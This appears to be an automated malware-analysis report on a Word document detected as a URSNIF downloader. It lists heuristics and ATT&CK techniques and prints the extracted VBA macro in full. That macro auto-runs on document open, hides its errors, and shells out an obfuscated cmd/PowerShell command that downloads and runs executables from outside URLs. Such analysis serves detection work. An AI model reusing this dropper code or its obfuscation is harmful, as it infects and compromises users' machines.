MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
This document contains a VBA macro that executes a command using the Windows command shell. The macro attempts to construct and run a complex command string, likely to download and execute a second-stage payload. The ClamAV detection as 'Doc.Downloader.URSNIF' further supports this malicious intent.
Heuristics 6
-
ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4001 bytes |
SHA-256: 731a3f146231af94da4af8538095699a550715c33dc28582af8beae866a84ab0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "czDYKwjdbUXnG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Shell Format(JlvBhD) + zIREXRAawiP + ARLjmGvuBdzTjw + ltLmiCR + rRihKOjFFh + JtlRKTjiaQ + BiLllbITjUuzX, vbHide
End Sub
Attribute VB_Name = "wfUloUYFmoi"
Function ltLmiCR()
On _
Error _
Resume _
Next
Month "5305" + "wlu"
tHiZzHjDXYi = Chr(9 + 4 + 15 + 2 + 69) + "md /V^" + ":/" + Chr(6 + 2 + 10 + 1 + 48) + Chr(2 + 1 + 5 + 0 + 26) + "^s" + "^e" + "^t ^" + "w^L7" + "3= ^ ^" + " ^ "
Month "6433" + "lwBjqAXY"
Month "zGZc" + "pdK"
NQbrFRwrf = "^" + " ^" + " ^ " + " " + " ^ ^ ^ " + " ^ }^}{" + "h"
Month "OZTsDU" + "ZVOZVX" + "97828236" + "iZI"
Month "IJq" + "jdHQrI"
JMdGY = Chr(9 + 4 + 15 + 2 + 69) + "^" + "t^a" + Chr(9 + 4 + 15 + 2 + 69) + "}^;" + "k^a^erb" + "^;k^HJ^" + "$^ ^me^" + "tI-^" + "e^k" + "ovnI;)^" + "k^HJ$^" + " ^,Rr" + "^z" + "$(^el^" + "i^Fd^a"
Month "UM" + "Yinnf"
Month "HlXlCODPV" + "ZOWY"
ZEUiaw = "^oln" + "w^o" + "^D^." + Chr(6 + 2 + 10 + 1 + 48) + "aO" + "${^" + "y" + "r" + "t^{)^" + "G^Y^" + "f^$ n" + "i^ " + "Rr^z^$(" + "^h" + Chr(9 + 4 + 15 + 2 + 69) + "a" + "^erof^;"
Month "vE" + "QOiVAKqJrVh"
Month "4599" + "Jih"
qGjOHU = "'" + "^exe." + "'^+^iE" + "^i^$" + "^+^'^" + "\^" + "'^+"
Month "swqTKaob" + "G"
Month "289255800" + "Cn"
Month "512805565" + "442578194" + "YAHiwMpYYXqBz" + "cjqtT"
Month "uiG" + "zSwYrbFi" + "4502" + "GCls"
GavCciCtzTa = Chr(9 + 4 + 15 + 2 + 69) + "^i^l" + "^bup:" + "vn^e^$^" + "=kH^J^$" + ";'" + "^4" + "73^'^" + " =^ ^" + "i" + "E^i^$;)" + "'@'("
Month "63044804" + "UmnzIiJta" + "A" + "9221"
Month "298926267" + "L"
OjFJvtQGB = "^t" + "il^p^" + "S^.^'nk" + "t^.4^b^" + "k^o^=^" + "l^?" + "^p"
Month "3060" + "5150" + "r" + "317404383"
Month "f" + "R"
Month "835" + "52380609"
pqsBrqQisX = "^h^p.^t" + "o^k^sn" + "^a" + "p^o/" + "^T^TR"
Month "186668196" + "AzP"
Month "482327998" + "VFDqwq" + "piz" + "wpsE"
lfhBwVrr = "/m^o" + Chr(9 + 4 + 15 + 2 + 69) + ".^9^o^" + "p^bp" + "1q^ht^y" + "^9z" + "ru//:" + "pt" + "th^"
Month "MO" + "398473261" + "660" + "2992"
Month "z" + "oAs"
Month "EAIb" + "VFiwEMGc" + "509368888" + "iVdtSC"
Month "WoUsIwK" + "4666"
CLqvcAYtT = "'" + "=" + "GY^f" + "^" + "$;tnei" + "l" + Chr(6 + 2 + 10 + 1 + 48) + "b" + "^" + "e^" + "W.t^eN"
Month "5390" + "R"
Month "JGDoc" + "tVlWf" + "s" + "hjntTA"
Month "BI" + "SoE" + "w" + "9217"
AvcjAU = " ^t" + Chr(9 + 4 + 15 + 2 + 69) + "^e^j" + "^bo^-" + "wen^=" + Chr(6 + 2 + 10 + 1 + 48) + "a" + "O^$ ^" + "l^le^h" + "^" + "s" + "rew^o^p" + "&&^f"
ltLmiCR = tHiZzHjDXYi + NQbrFRwrf + JMdGY + ZEUiaw + qGjOHU + GavCciCtzTa + OjFJvtQGB + pqsBrqQisX + lfhBwVrr + CLqvcAYtT + AvcjAU
Month "WCEtKii" + "316121387" + "784" + "jQ"
Month "1419" + "hfbuwPjkE" + "Ncb" + "391547414"
Month "iRYl" + "1862"
End Function
Function rRihKOjFFh()
On _
Error _
Resume _
Next
Month "jlXi" + "rHI" + "6866" + "mCnw"
Month "Io" + "lI"
OzfAVBsw = "^or" + " /^L " + "%^Y" + " ^" + "in" + " (^2^63" + "^;-^" + "1^;0)^d" + "^o ^s" + "^et" + " ^5" + Chr(9 + 4 + 15 + 2 + 69) + "^Z^U=!" + "^5" + Chr(9 + 4 + 15 + 2 + 69) + "^Z^U"
Month "7363" + "p"
Month "zwqY" + "5602" + "1597" + "231638475"
Month "ZNA" + "9276" + "oj" + "Nk"
rTjGTlrWqa = "!!^w^" + "L73:" + "~%" + "^Y" + ",1!&&^" + "if" + " %^" + "Y=" + "^=^0 " + Chr(9 + 4 + 15 + 2 + 69) + "^"
Month "Ms" + "lBF" + "HYMLEjiVJRt" + "350128085"
fhtuTLbqf = "a^" + "l^l " + "%" + "^5" + Chr(9 + 4 + 15 + 2 + 69) + "^Z^U" + ":^~6%" + Chr(2 + 1 + 5 + 0 + 26) + " " + ""
rRihKOjFFh = OzfAVBsw + rTjGTlrWqa + fhtuTLbqf
Month "YfLA" + "402569339"
Month "VQli" + "uqXvkqht"
Month "oMvP" + "ILBjFf"
Month "9453" + "340053906"
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.